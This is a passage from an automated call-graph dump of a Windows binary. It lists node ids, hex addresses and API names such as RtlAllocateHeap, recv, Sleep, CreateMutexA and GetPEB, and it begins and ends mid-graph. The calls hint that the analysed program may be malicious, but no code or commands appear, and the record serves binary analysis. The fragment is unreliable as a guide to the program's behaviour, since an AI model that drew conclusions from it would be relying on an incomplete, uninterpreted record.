10255 b78dec 10254->10255 10256 b88220 RtlAllocateHeap 10255->10256 10258 b78dfe shared_ptr 10256->10258 10257 b78e7e shared_ptr __floor_pentium4 10257->10173 10258->10257 10259 ba6c6a RtlAllocateHeap 10258->10259 10260 b78eaa 10259->10260 10261 b87a00 RtlAllocateHeap 10260->10261 10262 b78f0f 10261->10262 10263 b75c10 4 API calls 10262->10263 10264 b78f1a 10263->10264 10265 b880c0 RtlAllocateHeap 10264->10265 10266 b78f6c 10265->10266 10267 b88220 RtlAllocateHeap 10266->10267 10269 b78f7e shared_ptr 10267->10269 10268 b78ffe shared_ptr __floor_pentium4 10268->10173 10269->10268 10270 ba6c6a RtlAllocateHeap 10269->10270 10271 b7902a 10270->10271 10273 b88248 10272->10273 10274 b88292 10272->10274 10273->10274 10275 b88251 10273->10275 10278 b88f40 RtlAllocateHeap 10274->10278 10279 b882a1 10274->10279 10645 b89280 10275->10645 10277 b8825a 10277->10175 10278->10279 10279->10175 10293 b87f80 10280->10293 10282 b7596b 10282->10186 10284 b74dc2 10283->10284 10288 b74b92 10283->10288 10284->10189 10286 b74ce5 10286->10284 10287 b88ca0 RtlAllocateHeap 10286->10287 10287->10286 10288->10286 10308 ba6da6 10288->10308 10313 b88ca0 10288->10313 10442 b72280 10290->10442 10297 b87f9e __cftof 10293->10297 10298 b87fc7 10293->10298 10294 b880b3 10295 b89270 RtlAllocateHeap 10294->10295 10296 b880b8 10295->10296 10299 b72480 RtlAllocateHeap 10296->10299 10297->10282 10298->10294 10300 b8801b 10298->10300 10301 b8803e 10298->10301 10302 b880bd 10299->10302 10300->10296 10303 b8d3e2 RtlAllocateHeap 10300->10303 10304 b8d3e2 RtlAllocateHeap 10301->10304 10305 b8802c __cftof 10301->10305 10303->10305 10304->10305 10306 b88095 shared_ptr 10305->10306 10307 ba6c6a RtlAllocateHeap 10305->10307 10306->10282 10307->10294 10309 ba6dc2 10308->10309 10310 ba6db4 10308->10310 10309->10288 10328 ba6d19 10310->10328 10314 b88dc9 10313->10314 10315 b88cc3 10313->10315 10316 b89270 RtlAllocateHeap 10314->10316 10319 b88d2f 10315->10319 10320 b88d05 10315->10320 10317 b88dce 10316->10317 10318 b72480 RtlAllocateHeap 10317->10318 10326 b88d16 __cftof 10318->10326 10324 b8d3e2 RtlAllocateHeap 10319->10324 10319->10326 10320->10317 10321 b88d10 10320->10321 10323 b8d3e2 RtlAllocateHeap 10321->10323 10322 ba6c6a RtlAllocateHeap 10325 b88dd8 10322->10325 10323->10326 10324->10326 10326->10322 10327 b88d8b shared_ptr __cftof 10326->10327 10327->10288 10333 ba690a 10328->10333 10332 ba6d3d 10332->10288 10334 ba692a 10333->10334 10335 ba6921 10333->10335 10334->10335 10336 baa671 __cftof 4 API calls 10334->10336 10341 ba6d52 10335->10341 10337 ba694a 10336->10337 10347 bab5fb 10337->10347 10342 ba6d8f 10341->10342 10343 ba6d5f 10341->10343 10422 bab67d 10342->10422 10346 ba6d6e 10343->10346 10417 bab6a1 10343->10417 10346->10332 10348 bab60e 10347->10348 10349 ba6960 10347->10349 10348->10349 10355 baf5ab 10348->10355 10351 bab628 10349->10351 10352 bab63b 10351->10352 10353 bab650 10351->10353 10352->10353 10368 bae6b1 10352->10368 10353->10335 10356 baf5b7 __dosmaperr 10355->10356 10357 baa671 __cftof 4 API calls 10356->10357 10359 baf5c0 __dosmaperr 10357->10359 10358 baf606 10358->10349 10359->10358 10364 baf62c 10359->10364 10361 baf5ef __cftof 10361->10358 10362 ba8bec __cftof 4 API calls 10361->10362 10363 baf62b 10362->10363 10365 baf63a __dosmaperr 10364->10365 10367 baf647 10364->10367 10366 baf35f __dosmaperr RtlAllocateHeap 10365->10366 10365->10367 10366->10367 10367->10361 10369 baa671 __cftof 4 API calls 10368->10369 10370 bae6bb 10369->10370 10373 bae5c9 10370->10373 10372 bae6c1 10372->10353 10374 bae5d5 __dosmaperr 10373->10374 10376 bae5ef __cftof 10374->10376 10380 baadf5 __freea RtlAllocateHeap 10374->10380 10375 bae5f6 10375->10372 10376->10375 10377 ba8bec __cftof 4 API calls 10376->10377 10378 bae668 10377->10378 10379 bae6a4 10378->10379 10384 baa72e 10378->10384 10379->10372 10380->10376 10385 baa739 __dosmaperr 10384->10385 10387 bad82f __dosmaperr RtlAllocateHeap 10385->10387 10395 baa745 10385->10395 10386 ba8bec __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10388 baa7c7 10386->10388 10390 baa769 __dosmaperr 10387->10390 10389 baa7be 10398 bae4b0 10389->10398 10391 baa771 __dosmaperr 10390->10391 10392 baa7a5 10390->10392 10393 baadf5 __freea RtlAllocateHeap 10391->10393 10394 baa49f __dosmaperr RtlAllocateHeap 10392->10394 10393->10395 10396 baa7b0 10394->10396 10395->10386 10395->10389 10397 baadf5 __freea RtlAllocateHeap 10396->10397 10397->10395 10399 bae5c9 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10398->10399 10400 bae4c3 10399->10400 10401 bae259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10400->10401 10402 bae4cb 10401->10402 10403 bae4dc 10402->10403 10404 bab04b __cftof RtlAllocateHeap 10402->10404 10403->10379 10405 bae4ed 10404->10405 10406 bae51f 10405->10406 10407 bae6c4 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10405->10407 10408 baadf5 __freea RtlAllocateHeap 10406->10408 10409 bae512 10407->10409 10410 bae52d 10408->10410 10411 bae51a 10409->10411 10414 bae535 __cftof 10409->10414 10410->10379 10412 ba75f6 __dosmaperr RtlAllocateHeap 10411->10412 10412->10406 10413 bae561 10413->10406 10416 bae14b __cftof RtlAllocateHeap 10413->10416 10414->10413 10415 baadf5 __freea RtlAllocateHeap 10414->10415 10415->10413 10416->10406 10418 ba690a __cftof 4 API calls 10417->10418 10419 bab6be 10418->10419 10421 bab6ce __floor_pentium4 10419->10421 10427 baf1bf 10419->10427 10421->10346 10423 baa671 __cftof 4 API calls 10422->10423 10424 bab688 10423->10424 10425 bab5fb __cftof 4 API calls 10424->10425 10426 bab698 10425->10426 10426->10346 10428 ba690a __cftof 4 API calls 10427->10428 10429 baf1df __cftof 10428->10429 10430 baf29d __floor_pentium4 10429->10430 10433 baf232 __cftof 10429->10433 10434 bab04b 10429->10434 10430->10421 10438 baf2c2 10433->10438 10437 bab059 __dosmaperr 10434->10437 10435 ba75f6 __dosmaperr RtlAllocateHeap 10436 bab087 10435->10436 10436->10433 10437->10435 10437->10436 10439 baf2ce 10438->10439 10440 baf2df 10438->10440 10439->10440 10441 baadf5 __freea RtlAllocateHeap 10439->10441 10440->10430 10441->10440 10443 b72296 10442->10443 10446 ba87f8 10443->10446 10449 ba7609 10446->10449 10448 b722a4 10448->10220 10450 ba7649 10449->10450 10451 ba7631 10449->10451 10450->10451 10453 ba7651 10450->10453 10452 ba75f6 __dosmaperr RtlAllocateHeap 10451->10452 10454 ba7636 10452->10454 10455 ba690a __cftof 4 API calls 10453->10455 10456 ba6c5a ___std_exception_copy RtlAllocateHeap 10454->10456 10457 ba7661 10455->10457 10458 ba7641 __floor_pentium4 10456->10458 10462 ba7bc4 10457->10462 10458->10448 10478 ba868d 10462->10478 10464 ba76e8 10475 ba7a19 10464->10475 10465 ba7be4 10466 ba75f6 __dosmaperr RtlAllocateHeap 10465->10466 10467 ba7be9 10466->10467 10468 ba6c5a ___std_exception_copy RtlAllocateHeap 10467->10468 10468->10464 10469 ba7bd5 10469->10464 10469->10465 10485 ba7d15 10469->10485 10493 ba8168 10469->10493 10498 ba7dc2 10469->10498 10503 ba7de8 10469->10503 10532 ba7f36 10469->10532 10476 baadf5 __freea RtlAllocateHeap 10475->10476 10477 ba7a29 10476->10477 10477->10458 10479 ba8692 10478->10479 10480 ba86a5 10478->10480 10481 ba75f6 __dosmaperr RtlAllocateHeap 10479->10481 10480->10469 10482 ba8697 10481->10482 10483 ba6c5a ___std_exception_copy RtlAllocateHeap 10482->10483 10484 ba86a2 10483->10484 10484->10469 10554 ba7d34 10485->10554 10487 ba7d1a 10488 ba7d31 10487->10488 10489 ba75f6 __dosmaperr RtlAllocateHeap 10487->10489 10488->10469 10490 ba7d23 10489->10490 10491 ba6c5a ___std_exception_copy RtlAllocateHeap 10490->10491 10492 ba7d2e 10491->10492 10492->10469 10494 ba8171 10493->10494 10495 ba8178 10493->10495 10563 ba7b50 10494->10563 10495->10469 10499 ba7dcb 10498->10499 10500 ba7dd2 10498->10500 10501 ba7b50 4 API calls 10499->10501 10500->10469 10502 ba7dd1 10501->10502 10502->10469 10504 ba7e09 10503->10504 10505 ba7def 10503->10505 10508 ba75f6 __dosmaperr RtlAllocateHeap 10504->10508 10509 ba7e39 10504->10509 10506 ba7fbb 10505->10506 10507 ba7f4f 10505->10507 10505->10509 10511 ba7fc2 10506->10511 10512 ba8001 10506->10512 10522 ba7f92 10506->10522 10518 ba7f5b 10507->10518 10507->10522 10510 ba7e25 10508->10510 10509->10469 10513 ba6c5a ___std_exception_copy RtlAllocateHeap 10510->10513 10515 ba7f69 10511->10515 10516 ba7fc7 10511->10516 10604 ba8604 10512->10604 10517 ba7e30 10513->10517 10530 ba7f77 10515->10530 10531 ba7f8b 10515->10531 10598 ba8241 10515->10598 10516->10522 10523 ba7fcc 10516->10523 10517->10469 10518->10515 10521 ba7fa2 10518->10521 10518->10530 10521->10531 10575 ba8390 10521->10575 10522->10530 10522->10531 10589 ba8420 10522->10589 10524 ba7fdf 10523->10524 10525 ba7fd1 10523->10525 10583 ba8571 10524->10583 10525->10531 10579 ba85e5 10525->10579 10530->10531 10607 ba86ea 10530->10607 10531->10469 10533 ba7fbb 10532->10533 10534 ba7f4f 10532->10534 10535 ba7fc2 10533->10535 10536 ba8001 10533->10536 10541 ba7f92 10533->10541 10534->10541 10542 ba7f5b 10534->10542 10537 ba7f69 10535->10537 10538 ba7fc7 10535->10538 10539 ba8604 RtlAllocateHeap 10536->10539 10544 ba8241 4 API calls 10537->10544 10552 ba7f77 10537->10552 10553 ba7f8b 10537->10553 10538->10541 10545 ba7fcc 10538->10545 10539->10552 10540 ba7fa2 10549 ba8390 4 API calls 10540->10549 10540->10553 10543 ba8420 RtlAllocateHeap 10541->10543 10541->10552 10541->10553 10542->10537 10542->10540 10542->10552 10543->10552 10544->10552 10546 ba7fdf 10545->10546 10547 ba7fd1 10545->10547 10548 ba8571 RtlAllocateHeap 10546->10548 10550 ba85e5 RtlAllocateHeap 10547->10550 10547->10553 10548->10552 10549->10552 10550->10552 10551 ba86ea 4 API calls 10551->10553 10552->10551 10552->10553 10553->10469 10557 ba7d5e 10554->10557 10556 ba7d40 10556->10487 10558 ba7d80 10557->10558 10559 ba75f6 __dosmaperr RtlAllocateHeap 10558->10559 10562 ba7db7 10558->10562 10560 ba7dac 10559->10560 10561 ba6c5a ___std_exception_copy RtlAllocateHeap 10560->10561 10561->10562 10562->10556 10564 ba7b62 10563->10564 10568 ba7b67 10563->10568 10566 ba75f6 __dosmaperr RtlAllocateHeap 10564->10566 10566->10568 10571 ba8ab6 10568->10571 10569 ba75f6 __dosmaperr RtlAllocateHeap 10570 ba7b99 10569->10570 10570->10469 10572 ba8ad1 10571->10572 10573 ba8868 GetPEB ExitProcess GetPEB RtlAllocateHeap 10572->10573 10574 ba7b85 10573->10574 10574->10569 10574->10570 10576 ba83ab 10575->10576 10577 ba83dd 10576->10577 10611 bac88e 10576->10611 10577->10530 10580 ba85f1 10579->10580 10581 ba8420 RtlAllocateHeap 10580->10581 10582 ba8603 10581->10582 10582->10530 10588 ba8586 10583->10588 10584 ba75f6 __dosmaperr RtlAllocateHeap 10585 ba858f 10584->10585 10586 ba6c5a ___std_exception_copy RtlAllocateHeap 10585->10586 10587 ba859a 10586->10587 10587->10530 10588->10584 10588->10587 10590 ba8433 10589->10590 10591 ba8465 10590->10591 10592 ba844e 10590->10592 10597 ba845e 10591->10597 10614 ba779f 10591->10614 10593 ba75f6 __dosmaperr RtlAllocateHeap 10592->10593 10594 ba8453 10593->10594 10596 ba6c5a ___std_exception_copy RtlAllocateHeap 10594->10596 10596->10597 10597->10530 10599 ba825a 10598->10599 10600 ba779f RtlAllocateHeap 10599->10600 10601 ba8297 10600->10601 10624 bad3c8 10601->10624 10603 ba830d 10603->10530 10603->10603 10605 ba8420 RtlAllocateHeap 10604->10605 10606 ba861b 10605->10606 10606->10530 10609 ba875d __floor_pentium4 10607->10609 10610 ba8707 10607->10610 10608 bac88e __cftof 4 API calls 10608->10610 10609->10531 10610->10608 10610->10609 10612 bac733 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10611->10612 10613 bac8a6 10612->10613 10613->10577 10615 ba77c3 10614->10615 10616 ba77b4 10614->10616 10618 ba77b9 10615->10618 10619 bab04b __cftof RtlAllocateHeap 10615->10619 10617 ba75f6 __dosmaperr RtlAllocateHeap 10616->10617 10617->10618 10618->10597 10620 ba77ea 10619->10620 10621 ba7a33 RtlAllocateHeap 10620->10621 10623 ba7801 10620->10623 10621->10623 10622 baadf5 __freea RtlAllocateHeap 10622->10618 10623->10622 10625 bad3d8 10624->10625 10626 bad3ee 10624->10626 10627 ba75f6 __dosmaperr RtlAllocateHeap 10625->10627 10626->10625 10631 bad400 10626->10631 10628 bad3dd 10627->10628 10629 ba6c5a ___std_exception_copy RtlAllocateHeap 10628->10629 10630 bad3e7 10629->10630 10630->10603 10632 bad467 10631->10632 10634 bad439 10631->10634 10633 bad485 10632->10633 10635 bad48a 10632->10635 10636 bad4ae 10633->10636 10637 bad4e4 10633->10637 10641 bad2ff RtlAllocateHeap 10634->10641 10638 bacbdf GetPEB ExitProcess GetPEB RtlAllocateHeap 10635->10638 10639 bad4cc 10636->10639 10640 bad4b3 10636->10640 10642 bacef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 10637->10642 10638->10630 10644 bad0e2 GetPEB ExitProcess GetPEB RtlAllocateHeap 10639->10644 10643 bad23e GetPEB ExitProcess GetPEB RtlAllocateHeap 10640->10643 10641->10630 10642->10630 10643->10630 10644->10630 10646 b89294 10645->10646 10649 b892a5 __cftof 10646->10649 10650 b894e0 10646->10650 10648 b8932b 10648->10277 10649->10277 10651 b89619 10650->10651 10653 b8950b 10650->10653 10652 b89270 RtlAllocateHeap 10651->10652 10654 b8961e 10652->10654 10656 b89579 10653->10656 10657 b89552 10653->10657 10655 b72480 RtlAllocateHeap 10654->10655 10663 b89563 __cftof 10655->10663 10661 b8d3e2 RtlAllocateHeap 10656->10661 10656->10663 10657->10654 10658 b8955d 10657->10658 10660 b8d3e2 RtlAllocateHeap 10658->10660 10659 ba6c6a RtlAllocateHeap 10662 b89628 shared_ptr 10659->10662 10660->10663 10661->10663 10662->10648 10663->10659 10664 b895e1 shared_ptr __cftof 10663->10664 10664->10648 10665 b718a0 10666 b880c0 RtlAllocateHeap 10665->10666 10667 b718b1 10666->10667 10670 b8d64e 10667->10670 10673 b8d621 10670->10673 10674 b8d630 10673->10674 10675 b8d637 10673->10675 10679 ba988e 10674->10679 10682 ba98fa 10675->10682 10678 b718bb 10680 ba98fa RtlAllocateHeap 10679->10680 10681 ba98a0 10680->10681 10681->10678 10685 ba9630 10682->10685 10684 ba992b 10684->10678 10686 ba963c __dosmaperr 10685->10686 10689 ba968b 10686->10689 10688 ba9657 10688->10684 10690 ba96a7 10689->10690 10698 ba971e __dosmaperr 10689->10698 10697 ba96fe 10690->10697 10690->10698 10699 baedf6 10690->10699 10692 baedf6 RtlAllocateHeap 10694 ba9714 10692->10694 10693 ba96f4 10695 baadf5 __freea RtlAllocateHeap 10693->10695 10696 baadf5 __freea RtlAllocateHeap 10694->10696 10695->10697 10696->10698 10697->10692 10697->10698 10698->10688 10698->10698 10700 baee1e 10699->10700 10701 baee03 10699->10701 10703 baee2d 10700->10703 10708 bb4fdc 10700->10708 10701->10700 10702 baee0f 10701->10702 10704 ba75f6 __dosmaperr RtlAllocateHeap 10702->10704 10715 bb500f 10703->10715 10707 baee14 __cftof 10704->10707 10707->10693 10709 bb4ffc 10708->10709 10710 bb4fe7 10708->10710 10709->10703 10711 ba75f6 __dosmaperr RtlAllocateHeap 10710->10711 10712 bb4fec 10711->10712 10713 ba6c5a ___std_exception_copy RtlAllocateHeap 10712->10713 10714 bb4ff7 10713->10714 10714->10703 10716 bb501c 10715->10716 10717 bb5027 10715->10717 10719 bab04b __cftof RtlAllocateHeap 10716->10719 10718 bb502f 10717->10718 10722 bb5038 __dosmaperr 10717->10722 10720 baadf5 __freea RtlAllocateHeap 10718->10720 10723 bb5024 10719->10723 10720->10723 10721 ba75f6 __dosmaperr RtlAllocateHeap 10721->10723 10722->10721 10722->10723 10723->10707 10729 b720a0 10734 b8c68b 10729->10734 10732 b8d64e RtlAllocateHeap 10733 b720b6 10732->10733 10737 b8c3d5 10734->10737 10736 b720ac 10736->10732 10738 b8c3eb 10737->10738 10739 b8c3e1 10737->10739 10738->10736 10740 b8c3be 10739->10740 10741 b8c39e 10739->10741 10750 b8cd0a 10740->10750 10741->10738 10746 b8ccd5 10741->10746 10743 b8c3d0 10743->10736 10747 b8cce3 InitializeCriticalSectionEx 10746->10747 10749 b8c3b7 10746->10749 10747->10749 10749->10736 10751 b8cd1f RtlInitializeConditionVariable 10750->10751 10751->10743 10782 b734a0 10783 b734aa 10782->10783 10784 b734ca shared_ptr 10782->10784 10783->10784 10785 ba6c6a RtlAllocateHeap 10783->10785 10786 b734f2 10785->10786 10788 b73537 shared_ptr 10786->10788 10790 b8c17c 10786->10790 10791 b8c18a Concurrency::cancel_current_task 10790->10791 10794 b8c0e9 10791->10794 10793 b8c1aa Concurrency::cancel_current_task 10795 b722e0 std::future_error::future_error RtlAllocateHeap 10794->10795 10796 b8c0fb 10795->10796 10796->10793 10797 b75cad 10799 b75caf shared_ptr 10797->10799 10798 b75d17 shared_ptr __floor_pentium4 10799->10798 10800 ba6c6a RtlAllocateHeap 10799->10800 10801 b75d47 __cftof 10800->10801 10801->10801 10802 b880c0 RtlAllocateHeap 10801->10802 10804 b75e3e 10802->10804 10803 b75ea6 shared_ptr __floor_pentium4 10804->10803 10805 ba6c6a RtlAllocateHeap 10804->10805 10806 b75ed2 10805->10806 10807 b75ffe shared_ptr __floor_pentium4 10806->10807 10808 ba6c6a RtlAllocateHeap 10806->10808 10809 b7601b 10808->10809 10810 b880c0 RtlAllocateHeap 10809->10810 10811 b76089 10810->10811 10812 b880c0 RtlAllocateHeap 10811->10812 10813 b760bd 10812->10813 10814 b880c0 RtlAllocateHeap 10813->10814 10815 b760ee 10814->10815 10816 b880c0 RtlAllocateHeap 10815->10816 10817 b7611f 10816->10817 10818 b880c0 RtlAllocateHeap 10817->10818 10820 b76150 10818->10820 10819 b765b1 shared_ptr __floor_pentium4 10820->10819 10821 ba6c6a RtlAllocateHeap 10820->10821 10822 b765dc 10821->10822 10823 b87a00 RtlAllocateHeap 10822->10823 10824 b766a6 10823->10824 10825 b75c10 4 API calls 10824->10825 10826 b766ac 10825->10826 10827 b75c10 4 API calls 10826->10827 10828 b766b1 10827->10828 10829 b722c0 4 API calls 10828->10829 10830 b766c9 shared_ptr 10829->10830 10831 b87a00 RtlAllocateHeap 10830->10831 10832 b76732 10831->10832 10833 b75c10 4 API calls 10832->10833 10834 b7673d 10833->10834 10835 b722c0 4 API calls 10834->10835 10844 b76757 shared_ptr 10835->10844 10836 b76852 10837 b880c0 RtlAllocateHeap 10836->10837 10839 b7689c 10837->10839 10838 b87a00 RtlAllocateHeap 10838->10844 10840 b880c0 RtlAllocateHeap 10839->10840 10842 b768e3 shared_ptr __floor_pentium4 10840->10842 10841 b75c10 4 API calls 10841->10844 10843 b722c0 4 API calls 10843->10844 10844->10836 10844->10838 10844->10841 10844->10843 10852 b75a9e 10855 b75a61 10852->10855 10853 b880c0 RtlAllocateHeap 10853->10855 10855->10852 10855->10853 10856 b87a00 RtlAllocateHeap 10855->10856 10857 b75bdd __floor_pentium4 10855->10857 10858 b75730 10855->10858 10856->10855 10862 b75860 shared_ptr 10858->10862 10866 b75799 shared_ptr 10858->10866 10859 b7592a 10867 b88200 10859->10867 10860 b880c0 RtlAllocateHeap 10860->10866 10863 b75900 shared_ptr __floor_pentium4 10862->10863 10864 ba6c6a RtlAllocateHeap 10862->10864 10863->10855 10865 b75934 10864->10865 10866->10859 10866->10860 10866->10862 10870 b8c1d9 10867->10870 10869 b8820a 10873 b8c15d 10870->10873 10872 b8c1ea Concurrency::cancel_current_task 10872->10869 10874 b722e0 std::future_error::future_error RtlAllocateHeap 10873->10874 10875 b8c16f 10874->10875 10875->10872 10876 b7a682 10878 b7a68a shared_ptr 10876->10878 10877 b7a949 10879 ba6c6a RtlAllocateHeap 10877->10879 10878->10877 10880 b7a75d shared_ptr 10878->10880 10881 b7a94e 10879->10881 10882 b880c0 RtlAllocateHeap 10880->10882 10883 ba6c6a RtlAllocateHeap 10881->10883 10884 b7a903 10882->10884 10885 b7a953 Sleep CreateMutexA 10883->10885 10886 b7a98e 10885->10886 10927 b88680 10928 b886e0 10927->10928 10928->10928 10936 b87760 10928->10936 10930 b886f9 10931 b88f40 RtlAllocateHeap 10930->10931 10932 b88714 10930->10932 10931->10932 10933 b88f40 RtlAllocateHeap 10932->10933 10935 b88769 10932->10935 10934 b887b1 10933->10934 10938 b8777b 10936->10938 10949 b87864 shared_ptr __cftof 10936->10949 10937 b878f1 10939 b89270 RtlAllocateHeap 10937->10939 10938->10937 10942 b877ea 10938->10942 10943 b87811 10938->10943 10948 b877fb __cftof 10938->10948 10938->10949 10940 b878f6 10939->10940 10941 b72480 RtlAllocateHeap 10940->10941 10944 b878fb 10941->10944 10942->10940 10946 b8d3e2 RtlAllocateHeap 10942->10946 10945 b8d3e2 RtlAllocateHeap 10943->10945 10943->10948 10945->10948 10946->10948 10947 ba6c6a RtlAllocateHeap 10947->10937 10948->10947 10948->10949 10949->10930 10950 b73c8e 10951 b73c98 10950->10951 10952 b73cb4 10951->10952 10969 b72410 10951->10969 10956 b73810 4 API calls 10952->10956 10957 b73ccf 10956->10957 10958 b73810 4 API calls 10957->10958 10959 b73cdb 10958->10959 10961 b73d52 10959->10961 10984 b87d50 10959->10984 10962 b8d3e2 RtlAllocateHeap 10961->10962 10963 b73d84 10962->10963 10964 b87d50 RtlAllocateHeap 10963->10964 10966 b73e03 10963->10966 10964->10966 10965 b73e9b shared_ptr 10966->10965 10967 ba6c6a RtlAllocateHeap 10966->10967 10968 b73ec1 10967->10968 10970 b72424 10969->10970 11016 b8b52d 10970->11016 10973 b73ce0 10974 b73d42 10973->10974 10976 b73d52 10973->10976 10975 b87d50 RtlAllocateHeap 10974->10975 10975->10976 10977 b8d3e2 RtlAllocateHeap 10976->10977 10978 b73d84 10977->10978 10979 b87d50 RtlAllocateHeap 10978->10979 10981 b73e03 10978->10981 10979->10981 10980 b73e9b shared_ptr 10980->10952 10981->10980 10982 ba6c6a RtlAllocateHeap 10981->10982 10983 b73ec1 10982->10983 10985 b87dcb 10984->10985 10986 b87d62 10984->10986 10987 b72480 RtlAllocateHeap 10985->10987 10988 b87d9c 10986->10988 10989 b87d6d 10986->10989 10990 b87d7a 10987->10990 10992 b87db9 10988->10992 10995 b8d3e2 RtlAllocateHeap 10988->10995 10989->10985 10991 b87d74 10989->10991 10993 ba6c6a RtlAllocateHeap 10990->10993 10997 b87d83 10990->10997 10994 b8d3e2 RtlAllocateHeap 10991->10994 10992->10961 11002 b87dd5 10993->11002 10994->10990 10996 b87da6 10995->10996 10996->10961 10997->10961 10998 b87f20 10999 b89270 RtlAllocateHeap 10998->10999 11012 b87e91 __cftof 10999->11012 11000 b87e01 11000->10961 11001 b87f1b 11006 b72480 RtlAllocateHeap 11001->11006 11002->10998 11002->11000 11002->11001 11004 b87e80 11002->11004 11005 b87ea7 11002->11005 11003 ba6c6a RtlAllocateHeap 11010 b87f2a __cftof 11003->11010 11004->11001 11007 b87e8b 11004->11007 11009 b8d3e2 RtlAllocateHeap 11005->11009 11005->11012 11006->10998 11008 b8d3e2 RtlAllocateHeap 11007->11008 11008->11012 11009->11012 11011 b87f61 shared_ptr 11010->11011 11014 ba6c6a RtlAllocateHeap 11010->11014 11011->10961 11012->11003 11013 b87f02 shared_ptr 11012->11013 11013->10961 11015 b87f7c 11014->11015 11024 ba3aed 11016->11024 11018 b8b5a5 ___std_exception_copy 11031 b8b1ad 11018->11031 11019 b8b598 11027 b8af56 11019->11027 11023 b7242a 11023->10973 11035 ba4f29 11024->11035 11026 b8b555 11026->11018 11026->11019 11026->11023 11028 b8af9f ___std_exception_copy 11027->11028 11030 b8afb2 shared_ptr 11028->11030 11047 b8b39f 11028->11047 11030->11023 11032 b8b1d8 11031->11032 11034 b8b1e1 shared_ptr 11031->11034 11033 b8b39f 5 API calls 11032->11033 11033->11034 11034->11023 11042 ba4f37 11035->11042 11037 ba4f2e __cftof 11037->11026 11038 bad634 __cftof 4 API calls 11037->11038 11041 ba8bfc __cftof 11037->11041 11038->11041 11039 ba65ed __cftof 3 API calls 11040 ba8c2f 11039->11040 11041->11039 11043 ba4f40 11042->11043 11045 ba4f43 11042->11045 11043->11037 11044 ba4f77 11044->11037 11045->11044 11046 ba8ba3 ___std_exception_destroy RtlAllocateHeap 11045->11046 11046->11044 11048 b8bedf InitOnceExecuteOnce 11047->11048 11049 b8b3e1 11048->11049 11050 b8b3e8 11049->11050 11058 ba6cbb 11049->11058 11050->11030 11059 ba6cc7 __dosmaperr 11058->11059 11060 baa671 __cftof 4 API calls 11059->11060 11063 ba6ccc 11060->11063 11061 ba8bec __cftof 4 API calls 11062 ba6cf6 11061->11062 11063->11061 11068 bb44f2 11069 bb44ff 11068->11069 11070 bb450c 11068->11070 11071 ba75f6 __dosmaperr RtlAllocateHeap 11069->11071 11073 bb4518 11070->11073 11074 ba75f6 __dosmaperr RtlAllocateHeap 11070->11074 11072 bb4504 11071->11072 11075 bb4539 11074->11075 11076 ba6c5a ___std_exception_copy RtlAllocateHeap 11075->11076 11076->11072 11125 b76ae9 11128 b76b01 11125->11128 11126 b880c0 RtlAllocateHeap 11127 b76bac 11126->11127 11129 b89280 RtlAllocateHeap 11127->11129 11128->11126 11130 b76bbd shared_ptr 11128->11130 11129->11130 11131 b880c0 RtlAllocateHeap 11130->11131 11132 b76ce3 shared_ptr __floor_pentium4 11131->11132 11133 b79adc 11137 b79aea shared_ptr 11133->11137 11134 b7a917 11135 b7a953 Sleep CreateMutexA 11134->11135 11136 ba6c6a RtlAllocateHeap 11134->11136 11145 b7a98e 11135->11145 11136->11135 11137->11134 11143 b79b4b shared_ptr 11137->11143 11138 b79b65 11140 b87a00 RtlAllocateHeap 11138->11140 11139 b79b59 11142 b880c0 RtlAllocateHeap 11139->11142 11141 b79b74 11140->11141 11144 b75c10 4 API calls 11141->11144 11146 b7a903 11142->11146 11143->11138 11143->11139 11147 b79b7c 11144->11147 11148 b78b30 4 API calls 11147->11148 11149 b79b8d 11148->11149 11150 b88220 RtlAllocateHeap 11149->11150 11151 b79b9c 11150->11151 11152 b87a00 RtlAllocateHeap 11151->11152 11153 b79ca9 11152->11153 11154 b75c10 4 API calls 11153->11154 11155 b79cb1 11154->11155 11156 b78b30 4 API calls 11155->11156 11157 b79cc2 11156->11157 11158 b88220 RtlAllocateHeap 11157->11158 11159 b79cd1 11158->11159 11165 b720c0 11166 b8c68b __Mtx_init_in_situ 2 API calls 11165->11166 11167 b720cc 11166->11167 11168 b8d64e RtlAllocateHeap 11167->11168 11169 b720d6 11168->11169 11180 b7e0c0 recv 11181 b7e122 recv 11180->11181 11182 b7e157 recv 11181->11182 11183 b7e191 11182->11183 11184 b7e2b3 __floor_pentium4 11183->11184 11185 b8c6ac GetSystemTimePreciseAsFileTime 11183->11185 11186 b7e2ee 11185->11186 11187 b8c26a 5 API calls 11186->11187 11188 b7e358 11187->11188 11189 b72ec0 11190 b72f06 11189->11190 11199 b72f6f 11189->11199 11191 b8c6ac GetSystemTimePreciseAsFileTime 11190->11191 11192 b72f12 11191->11192 11193 b7301e 11192->11193 11194 b72f1d 11192->11194 11195 b8c26a 5 API calls 11193->11195 11196 b72f30 __Mtx_unlock 11194->11196 11198 b8d3e2 RtlAllocateHeap 11194->11198 11197 b73024 11195->11197 11196->11197 11196->11199 11200 b8c26a 5 API calls 11197->11200 11198->11196 11201 b8c6ac GetSystemTimePreciseAsFileTime 11199->11201 11210 b72fef 11199->11210 11202 b72fb9 11200->11202 11201->11202 11203 b8c26a 5 API calls 11202->11203 11204 b72fc0 __Mtx_unlock 11202->11204 11203->11204 11205 b8c26a 5 API calls 11204->11205 11206 b72fd8 11204->11206 11205->11206 11207 b8c26a 5 API calls 11206->11207 11206->11210 11208 b7303c 11207->11208 11209 b8c6ac GetSystemTimePreciseAsFileTime 11208->11209 11219 b73080 shared_ptr __Mtx_unlock 11209->11219 11211 b8c26a 5 API calls 11212 b731cb 11211->11212 11213 b8c26a 5 API calls 11212->11213 11214 b731d1 11213->11214 11215 b8c26a 5 API calls 11214->11215 11221 b73193 __Mtx_unlock 11215->11221 11216 b731a7 __floor_pentium4 11217 b8c26a 5 API calls 11218 b731dd 11217->11218 11219->11212 11219->11216 11220 b8c6ac GetSystemTimePreciseAsFileTime 11219->11220 11222 b7315f 11219->11222 11220->11222 11221->11216 11221->11217 11222->11211 11222->11214 11222->11221 11248 b8d0c7 11249 b8d0d6 11248->11249 11250 b8d17f 11249->11250 11251 b8d17b RtlWakeAllConditionVariable 11249->11251 9927 ba6629 9930 ba64c7 9927->9930 9931 ba64d5 __cftof 9930->9931 9932 ba6520 9931->9932 9935 ba652b 9931->9935 9934 ba652a 9941 baa302 GetPEB 9935->9941 9937 ba6535 9938 ba654a __cftof 9937->9938 9939 ba653a 